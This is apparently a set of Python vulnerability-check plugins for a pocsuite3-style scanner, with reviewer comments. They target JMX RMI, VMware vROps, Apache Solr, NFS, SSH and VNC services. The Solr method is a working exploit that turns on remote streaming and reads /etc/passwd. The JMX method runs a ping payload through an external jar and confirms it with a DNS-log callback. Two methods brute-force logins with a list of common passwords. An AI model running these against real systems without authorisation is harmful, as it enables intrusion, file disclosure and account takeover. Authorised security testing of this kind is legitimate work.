def _verify(self):
    """Drive an external jar against host:port and confirm via a DNS-log callback.

    Runs ``./data/jmxrmi_1.7.jar`` (what the jar does is not visible here)
    with a ``ping`` payload aimed at ``<BANNER>.<DOMAIN>``, waits 2 s, and
    then asks ``self.test_dnslog(self.CEYE_URL)`` whether the callback was
    recorded. ``VerifyInfo`` (URL and payload) is filled only on a positive
    DNS-log check; either way the result is passed to ``self.save_output``.
    """
    result = {}
    vul_url = self.url
    target_url = vul_url
    host, port = url2ip(target_url, True)  # True -> (host, port) tuple
    #payload = "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
    payload = "'ping {0}.{1}'".format(self.BANNER, self.DOMAIN)
    #payload = "id & cmd.exe /c echo '{0}'".format(self.BANNER)
    command = "java -jar ./data/jmxrmi_1.7.jar {0} {1} {2}".format(
        host, port, payload)
    print(command)
    # NOTE(review): shell=True on a string assembled from host/port/BANNER/
    # DOMAIN means any shell metacharacters in those values are interpreted
    # by the local shell. An argv list with shell=False would avoid that —
    # confirm the jar accepts the payload as one argument first. pro1 is
    # never waited on or closed.
    pro1 = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
    output = pro1.stdout.read().decode()  # read only; used solely by the commented-out check below
    #print(output)
    time.sleep(2)  # give the DNS-log service 2 s to record the callback
    #if self.test_command(output):
    if self.test_dnslog(self.CEYE_URL):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = target_url
        result['VerifyInfo']['Payload'] = payload
        return self.save_output(result)
    return self.save_output(result)
def _verify(self):
    """Probe ``/ui/vropspluginui/rest/services/uploadova`` and report a hit on HTTP 405.

    Skips the target when ``self.is_port_open`` reports the port closed
    (returning ``None`` in that case rather than going through
    ``self.save_output``). The GET is made with ``verify=False``; any
    exception from ``req.get`` is printed and re-raised. A 405 status is
    taken as the signature — presumably "endpoint exists but rejects GET";
    no upload is attempted here.
    """
    result = {}
    vul_url = self.url
    host, port = url2ip(vul_url, True)  # True -> (host, port) tuple
    logger.info("检查端口开放情况...")
    # Don't waste time if the port isn't even open.
    if not self.is_port_open(host, port):
        logger.info("端口不开放! 退出!")
        return  # NOTE(review): returns None here, unlike the save_output paths below
    logger.info("端口开放... 继续")
    target_url = "{0}/ui/vropspluginui/rest/services/uploadova".format(
        vul_url)
    try:
        resp = req.get(target_url, verify=False)
    except Exception as e:
        print(e)
        raise e  # a bare `raise` would keep the original traceback intact
    if resp.status_code == 405:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = target_url
        return self.save_output(result)
    logger.info(resp)
    return self.save_output(result)
def _verify(self):
    """Check each Solr core for file disclosure through remote streaming on ``debug/dump``.

    For every core name returned by ``self.get_core_names``: POST a
    ``set-property`` enabling ``requestDispatcher.requestParsers.enableRemoteStreaming``
    to ``/solr/<core>/config``, then POST ``stream.url=file:///etc/passwd``
    to ``/solr/<core>/debug/dump?param=ContentStreams`` and look for
    ``root:x:0:0`` in the body. The first core that returns the file content
    is reported through ``self.save_output``; otherwise an empty result is
    saved. Returns ``None`` early if the port is closed.
    """
    result = {}
    vul_url = self.url
    host, port = url2ip(vul_url, True)  # True -> (host, port) tuple
    logger.info("检查端口开放情况...")
    # Don't waste time if the port isn't even open.
    if not self.is_port_open(host, port):
        logger.info("端口不开放! 退出!")
        return  # NOTE(review): returns None here, not self.save_output(result)
    logger.info("端口开放... 继续")
    url_cores = vul_url + "/solr/admin/cores?wt=json"
    payload = {
        "set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
    # payload2 is only recorded in the result; the request below sends the dict form instead.
    payload2 = 'stream.url=file:///etc/passwd'
    flag = 'root:x:0:0'  # marker expected in /etc/passwd
    core_names = self.get_core_names(url_cores)
    logger.info(core_names)
    # Send the config + stream request pair once per core.
    for core_name in core_names:
        logger.info("当前core_name: " + core_name)
        config_url = '{0}/solr/{1}/config'.format(self.url, core_name)
        stream_url = '{0}/solr/{1}/debug/dump?param=ContentStreams'.format(self.url, core_name)
        target_url = config_url
        resp = None
        try:
            req.post(config_url, json=payload, timeout=5)
            #resp = req.post(stream_url, data=payload2,timeout=5)
            resp = req.post(stream_url, data={'stream.url': 'file:///etc/passwd'}, timeout=5)
        except Exception as e:
            logger.error(e)
            #continue
        # NOTE(review): if either POST raised, resp is still None and the next
        # line raises AttributeError — the `continue` above is commented out.
        logger.info(resp.status_code)
        if resp.status_code == 404:
            logger.info('Not Found!')
        elif flag in resp.text:
            # Response is assumed to be JSON with streams[0].stream holding the file body.
            file_content = resp.json()['streams'][0]['stream']
            logger.info(file_content)
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            result['VerifyInfo']['core'] = core_name
            result['VerifyInfo']['Payload'] = payload2
            result['VerifyInfo']['Response'] = file_content
            return self.save_output(result)
    return self.save_output(result)
def _verify(self):
    """Try each username/password pair from the fixed lists against host:port, one thread per pair.

    Every pair is handed to ``self.validate`` (defined elsewhere), which is
    expected to set ``self.flag`` — and presumably ``self._username`` /
    ``self._password``, both initialised here — on success. All threads are
    started before any is joined. A hit records the target URL in
    ``VerifyInfo``; any exception is printed and the (possibly empty) result
    is still passed to ``self.save_output``.
    """
    result = {}
    vul_url = self.url
    target_url = vul_url
    host, port = url2ip(target_url, True)  # True -> (host, port) tuple
    # Includes the empty username / empty password case: there, any
    # credentials log in successfully.
    usernames = ['admin', 'test', '']
    passwords = [
        '123456', 'admin', 'root', 'password', '123123', '123', '1', '',
        'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789',
        '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000',
        '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456',
        '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!',
        'p@ssw0rd!', 'password1', 'r00t', 'system', '111111'
    ]
    try:
        self.flag = False  # reset before the threads start
        self._username = ''
        self._password = ''
        threads = []
        for username in usernames:
            for password in passwords:
                # NOTE(review): one thread per combination, no pool; self.flag is
                # shared between them with no synchronisation visible here.
                _thread = Thread(target=self.validate, args=(host, port, username, password))
                _thread.start()
                threads.append(_thread)
        # Wait for all threads to finish.
        for t in threads:
            t.join()
        #flag = self.validate(host, port, "cqq", "cqq")
        #print(flag)
        if self.flag:
            print(self._username)
            print(self._password)
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
    except Exception as e:
        print(e)  # catch-all: the error is printed and an empty result is saved
        return self.save_output(result)
def _verify(self):
    """Try each username/password pair from the fixed lists against host:port, one thread per pair.

    Every pair is handed to ``self.validate`` (defined elsewhere), which is
    expected to set ``self.flag`` on success. All threads are started before
    any is joined. A hit records the target URL in ``VerifyInfo``; any
    exception is printed and the (possibly empty) result is still passed to
    ``self.save_output``. ``IP_cn`` and ``proxies`` are assigned but not
    used by anything visible in this method.
    """
    result = {}
    vul_url = self.url
    target_url = vul_url
    # Passing True yields (host, port); see
    # https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
    host, port = url2ip(target_url, True)
    IP_cn = "https://ip.cn"  # unused here
    # Set both the http and https proxy to the suspected target (unused here).
    proxies = {'http': vul_url, 'https': vul_url}
    # Includes the empty username / empty password case: there, any
    # credentials log in successfully.
    usernames = ['admin', 'test', '']
    passwords = [
        '123456', 'admin', 'root', 'password', '123123', '123', '1', '',
        'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789',
        '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000',
        '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456',
        '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!',
        'p@ssw0rd!', 'password1', 'r00t', 'system', '111111'
    ]
    try:
        self.flag = False  # reset before the threads start
        threads = []
        for username in usernames:
            for password in passwords:
                # NOTE(review): one thread per combination, no pool; self.flag is
                # shared between them with no synchronisation visible here.
                _thread = Thread(target=self.validate, args=(host, port, username, password))
                _thread.start()
                threads.append(_thread)
        # Wait for all threads to finish.
        for t in threads:
            t.join()
        # Original comment: a 200 status means the authenticated HTTP access to
        # the target succeeded — that check lives in self.validate, not here.
        if self.flag:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
    except Exception as e:
        print(e)  # catch-all: the error is printed and an empty result is saved
        return self.save_output(result)
def _verify(self):
    """Send an NFS NULL call over TCP and report a hit if the reply echoes the request XID.

    Connects to host:port (5 s default timeout), sends the hard-coded NULL
    call whose XID is ``31ec4522``, reads up to 1024 bytes and takes hex
    characters 8..15 of the reply (bytes 4..7, i.e. just past the 4-byte
    record marker) as the reply XID. A match is recorded in ``VerifyInfo``;
    either way the result goes to ``self.save_output``. A socket error is
    printed and nothing is saved.
    """
    result = {}
    vul_url = self.url
    target_url = vul_url
    # Passing True yields (host, port); see
    # https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
    host, port = url2ip(target_url, True)
    socket.setdefaulttimeout(5)  # default timeout — NOTE(review): process-wide, affects every socket created afterwards
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        # NFS NULL Call: hex text of the record-marked RPC request (XID = 31ec4522),
        # decoded and converted to raw bytes below.
        NFS_NULL_Call = b'8000002831ec45220000000000000002000186a3000000040000000000000000000000000000000000000000'
        bNFS_NULL_Call = bytes.fromhex(NFS_NULL_Call.decode())
        #NFS_NULL_Call2 = base64.b64decode('gAAAKDHsRSIAAAAAAAAAAgABhqMAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA=')
        # Send the request.
        #sock.send(NFS_NULL_Call2)
        sock.send(bNFS_NULL_Call)
        # Receive the response (a single recv; a short read would shift the slice below).
        hello = sock.recv(1024)
        # NFS NULL Reply
        NFS_NULL_Reply = binascii.b2a_hex(hello)
        NFS_XID = NFS_NULL_Reply[8:16]
        print(NFS_XID)
        print("[*] NFS NULL Reply: {0}".format(NFS_NULL_Reply))
        # "31ec4522" is the XID we sent; if the reply carries it back the peer is
        # taken to speak the RPC/NFS protocol and the target is flagged.
        if NFS_XID.decode() == '31ec4522':
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
    except socket.error as msg:
        # NOTE(review): on Python 3 socket.error is OSError, which is not
        # subscriptable — msg[0] / msg[1] raise TypeError here — and
        # traceback.print_stack() expects a frame, not an exception. The
        # socket is never closed on either path.
        print(
            '[*] Could not connect to the target NFS service. Error code: '
            + str(msg[0]) + ' , Error message : ' + msg[1])
        traceback.print_stack(msg)
def _verify(self):
    """Run the two bypass tests against host:port and report the first one that succeeds.

    The port defaults to 22 when the URL carries none. ``password_auth_bypass_test``
    and ``fake_key_bypass_test`` are defined elsewhere. Results go through
    ``self.parse_attack`` (not ``save_output`` as sibling methods use), and the
    method returns ``None`` implicitly when neither test succeeds.
    """
    result = {}
    pr = urlparse(self.url)
    host = url2ip(self.url)  # single-argument form: host only (the sibling methods pass True for a (host, port) tuple)
    port = pr.port if pr.port else 22  # fall back to the default SSH port
    if password_auth_bypass_test(host, port):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['Target'] = '{0}:{1}'.format(host, port)
        return self.parse_attack(result)
    if fake_key_bypass_test(host, port):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['Target'] = '{0}:{1}'.format(host, port)
        return self.parse_attack(result)
    # NOTE(review): no explicit return here — callers get None when both tests fail.
def _verify(self):
    """Delegate to ``self.crack(host, port)`` and report the target on success.

    ``self.crack`` is defined elsewhere; the earlier RFB-banner check it
    replaced survives below as a bare triple-quoted string (a no-op
    expression statement, not a comment). Either outcome is passed to
    ``self.save_output``; a socket error is printed and nothing is saved.
    """
    result = {}
    vul_url = self.url
    target_url = vul_url
    # Passing True yields (host, port); see
    # https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
    host, port = url2ip(target_url, True)
    try:
        # NOTE(review): the block below is a string literal evaluated and discarded,
        # not a comment; kept as-is.
        '''
        socket.setdefaulttimeout(5) # default timeout
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.connect((host, port))
        hello = server.recv(12)
        print("[*] Hello From Server: {0}".format(hello))
        # if the response contains "RFB", e.g. "RFB 003.008" (the version), treat it as a VNC service
        if "RFB 003.008" in str(hello):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        '''
        if self.crack(host, port):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)
    except socket.error as msg:
        # NOTE(review): on Python 3 socket.error is OSError, which is not
        # subscriptable — msg[0] / msg[1] raise TypeError here — and
        # traceback.print_stack() expects a frame, not an exception.
        print(
            '[*] Could not connect to the target VNC service. Error code: '
            + str(msg[0]) + ' , Error message : ' + msg[1])
        traceback.print_stack(msg)